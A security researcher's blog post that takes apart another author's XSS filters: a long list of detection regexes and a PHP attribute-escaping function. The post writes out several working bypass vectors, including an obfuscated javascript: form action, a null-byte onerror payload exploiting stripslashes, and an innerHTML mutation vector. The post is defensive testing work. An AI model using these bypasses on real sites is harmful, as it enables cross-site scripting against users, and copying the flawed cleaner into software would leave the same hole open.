Unbreakable filter

I was bored so I thought I’d take a look at Ashar’s filters. I noticed he’d done a talk about it at Blackhat Europe which I was quite surprised at. Then I came across the following blog post about the talk which I pretty much agreed with. That blog post links to his filters so you can try them out yourself.

The first one is basically multiple JavaScript regexes which are far too generic to be of any value. For example “hahasrchaha” is considered a valid attack =) because it has “src” in. I’m not joking. The regexes are below.


function test(string) {
var match = /]*>[\s\S]*?/i.test(string) ||
/[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/i.test(string) ||
/(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/i.test(string) ||
/%[\d\w]{2}/i.test(string) ||
/&#[^&]{2}/i.test(string) ||
/&#x[^&]{3}/i.test(string) ||
/:/i.test(string) ||
/[\s\S]src[\s\S]/i.test(string) ||
/[\s\S]data:text\/html[\s\S]/i.test(string) ||
/[\s\S]xlink:href[\s\S]/i.test(string) ||
/[\s\S]base64[\s\S]/i.test(string) ||
/[\s\S]xmlns[\s\S]/i.test(string) ||
/[\s\S]xhtml[\s\S]/i.test(string) ||
/[\s\S]href[\s\S]/i.test(string) ||
/[\s\S]style[\s\S]/i.test(string) ||
/[\s\S]formaction[\s\S]/i.test(string) ||
/[\s\S]@import[\s\S]/i.test(string) ||
/[\s\S]!ENTITY.*?SYSTEM[\s\S]/i.test(string) ||
/[\s\S]pattern(?=.*?=)[\s\S]/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>?[\s\S]*?/i.test(string) ||
/]*>?[\s\S]*?/i.test(string);
return match ? 'Filter has catch your awesome vector ... Try hard :(' : 'Bypass :)';
}

Because the filter is so bad it makes it fun to find a vector. The following vector will bypass the rule:


<button form=x>xss<form id=x action="javas&Tab;cript:alert(1)"

Other examples are:-

@\import
javas&NewLine;cript:alert(1)

Ashar also claimed his new filter was “unbreakable”. There wasn’t a lot of code but still it was badly broken. Let’s talk a look at that code

function attributeContextCleaner($input) {
$bad_chars = array("\"", "'", "``");
$safe_chars = array("&quot;", "&apos;", "&grave;");
$output = str_replace($bad_chars, $safe_chars, $input);
return stripslashes($output);
}

Can you see it? Yeah he uses ““” instead of “`” so the code will look for two “`” rather than one but still that is not all. He uses stripslashes too for some random reason and we can use that to bypass the XSS Filter in IE. Not only does this code contain a glaring hole that it’s supposed to protect against but it also enables the XSS vector to function.


<?php
function attributeContextCleaner($input) {
$bad_chars = array("\"", "'", "``");
$safe_chars = array("&quot;", "&apos;", "&grave;");
$output = str_replace($bad_chars, $safe_chars, $input);
return stripslashes($output);
}
?>
<img title=`<?php echo attributeContextCleaner($_GET['x'])?>` />

The vector to bypass the function and the XSS filter is:-

?x=`src=1 \0\0\0\0onerror=`alert(1)`

Stripslashes in PHP kindly removes all \0 for us which enables us to bypass the filter. This obviously only works in compat mode where “`” is an allowed attribute quote. In conclusion I don’t recommend using any of the filters. Try mario’s instead.

Update…

It seems Ashar intended to cover innerHTML mutations with his “ check so it wasn’t a mistype. So I decided to break that instead with:

`\`onerror=alert(1)//

This works on older versions of IE and breaks his intended fix for that context.

Comments are closed :( too much spam. If you want to contact me about any article please email or tweet me.